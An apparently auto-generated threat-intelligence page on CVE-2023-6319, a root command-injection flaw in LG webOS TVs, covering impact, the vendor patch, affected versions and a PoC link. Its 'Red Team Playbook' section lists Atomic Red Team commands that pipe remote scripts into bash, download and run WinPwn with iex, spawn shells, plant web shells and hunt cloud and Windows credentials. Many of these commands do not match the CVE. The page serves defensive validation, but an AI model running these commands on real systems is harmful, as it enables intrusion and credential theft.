CVE-2023-6319
Overview
This vulnerability is a command injection flaw rooted in insufficient input validation within the getAudioMetadata method of the com.webos.service.attachedstoragemanager service on LG webOS. The affected component improperly handles user-supplied data in command execution contexts, allowing crafted inputs to be interpreted as system commands. This issue exists across multiple webOS versions from 4 through 7 on various LG TV models.
Vulnerability Description
A command injection vulnerability exists in the getAudioMetadata method from the com.webos.service.attachedstoragemanager service on webOS version 4 through 7. A series of specially crafted requests can lead to command execution as the root user. An attacker can make authenticated requests to trigger this vulnerability. * webOS 4.9.7 - 5.30.40 running on LG43UM7000PLA * webOS 5.5.0 - 04.50.51 running on OLED55CXPUA * webOS 6.3.3-442 (kisscurl-kinglake) - 03.36.50 running on OLED48C1PUB * webOS 7.3.1-43 (mullet-mebin) - 03.33.85 running on OLED55A23LA
Impact
An attacker with authenticated access can execute arbitrary commands as the root user on the affected LG webOS devices, enabling full system compromise. This includes the ability to manipulate system files, install malicious software, or disrupt device functionality. The prerequisite is authentication, but no user interaction is needed after that. The vulnerability’s CVSS vector (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) indicates network exploitation with high impact on confidentiality, integrity, and availability, facilitating potential lateral movement within a networked environment.
Solution
LG has released security updates addressing this command injection vulnerability, detailed in their advisory at https://lgsecurity.lge.com/bulletins/tv#updateDetails. Users should update affected devices to the latest firmware versions corresponding to their model and webOS version. The advisory provides specific patch versions and installation instructions for webOS versions 4.9.7 through 7.3.1-43. No alternative workarounds are documented; applying the vendor-provided patches is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical command injection vulnerability has been identified within the getAudioMetadata method of the com.webos.service.attachedstoragemanager service on various versions of webOS. This flaw allows an attacker to execute arbitrary commands with root privileges by sending specially crafted requests to the affected service. The vulnerability arises from insufficient input validation, enabling malicious users to manipulate the command execution flow. The affected versions span from webOS 4.9.7 to 7.3.1, impacting a range of LG smart TVs, including models such as the LG43UM7000PLA and OLED55CXPUA. Given the elevated privileges associated with the root user, successful exploitation can lead to severe consequences, including unauthorized access to sensitive data and system control.
Attack vectors for this vulnerability primarily involve authenticated requests made to the affected service. An attacker must first gain access to a legitimate user account, which could be achieved through various means, such as phishing or credential stuffing. Once authenticated, the attacker can craft specific requests that exploit the command injection flaw, allowing them to execute arbitrary commands on the device. This could lead to a range of malicious activities, from altering system configurations to installing malware or exfiltrating sensitive information. The ability to execute commands as the root user significantly amplifies the risk, as it provides the attacker with full control over the device.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on LG smart TVs for operations, marketing, or customer engagement. The potential for unauthorized access to sensitive data, including user information and proprietary business data, poses a significant risk to organizational integrity and reputation. Furthermore, if an attacker gains control over a device, they could leverage it for further attacks within the network, potentially compromising additional systems and leading to broader security incidents. The financial implications of such breaches can be severe, including costs associated with incident response, legal liabilities, and damage to brand reputation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating devices to the latest firmware versions is crucial, as manufacturers often release patches to address known vulnerabilities. Additionally, employing network monitoring tools can help identify unusual patterns of behavior indicative of exploitation attempts. Organizations should also enforce strict access controls, ensuring that only authorized personnel have access to sensitive systems and data. Educating users about the importance of strong, unique passwords and the risks associated with phishing attacks can further reduce the likelihood of unauthorized access.
In conclusion, the command injection vulnerability within the webOS service presents a significant threat to both individual users and organizations utilizing affected devices. The potential for root-level command execution underscores the need for immediate attention to security practices surrounding these devices. By adopting proactive detection and mitigation strategies, organizations can safeguard against the risks associated with this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-6319, as evidenced by a recent surge in telemetry detections. This increase corresponds with the emergence of new proof-of-concept exploits publicly available on code-sharing platforms, which have garnered attention within attacker communities. Although the EPSS score remains stable, the heightened detection activity signals growing adversary interest and potential weaponization. For defenders, this development elevates the urgency of monitoring authenticated access vectors on affected LG webOS devices, as the vulnerability enables root-level command execution that could facilitate persistent compromise or lateral movement. Consequently, the threat level associated with this vulnerability should be considered elevated due to the combination of active exploitation attempts and accessible exploit code, increasing the likelihood of successful attacks in operational environments.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Lg | Webos | 4.9.7 |
cpe:2.3:o:lg:webos:4.9.7:*:*:*:*:*:*:*
|
|
|
Lg | Webos | 5.5.0 |
cpe:2.3:o:lg:webos:5.5.0:*:*:*:*:*:*:*
|
|
|
Lg | Webos | 6.3.3-442 |
cpe:2.3:o:lg:webos:6.3.3-442:*:*:*:*:*:*:*
|
|
|
Lg | Webos | 7.3.1-43 |
cpe:2.3:o:lg:webos:7.3.1-43:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
illixion/root-my-webos-tv
CVE-2023-6319 proof of concept
|
illixion | 50 | 4 | 2024-04-11 | View |
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-6319 |
| bitdefender.com |
GitHub CVE
|
https://bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/ |
| lgsecurity.lge.com |
GitHub CVE
vendor-advisory
|
https://lgsecurity.lge.com/bulletins/tv#updateDetails |